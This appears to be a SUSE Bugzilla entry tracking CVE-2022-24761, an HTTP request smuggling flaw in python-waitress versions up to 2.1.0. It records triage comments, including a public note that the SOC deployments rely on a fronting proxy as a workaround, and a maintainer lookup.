Bugzilla – Bug 1197255
VUL-0: CVE-2022-24761: python-waitress: Inconsistent Interpretation of HTTP Requests leading to request smuggling
Last modified: 2022-09-22 11:41:58 UTC
When using Waitress behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends.
This would allow requests to be smuggled via the front-end proxy to waitress and later behavior.
Affected Versions <=2.1.0.
This is an autogenerated message for OBS integration:
This bug (1197255) was mentioned in
https://build.opensuse.org/request/show/962909 Factory / python-waitress
please let me know if the explanation in comment #2 is Ok for you for the SOC impacted parts.
Thanks in advance
based on comment #12, back to Security team.
This is a public comment for eventual customer questions: for SOC deployments, we choose the workaround instead of fixing python-waitress. The incoming packets will always be RFC7230 thanks to the fronting proxy. Therefore the request smuggling is not exploitable.
Matej is python-waitress under your wing or is it handled by the coldpool team?
$ isc maintainer python-waitress --email
Defined in package: SUSE:SLE-15:GA/python-waitress
bugowner of python-waitress :
maintainer of python-waitress :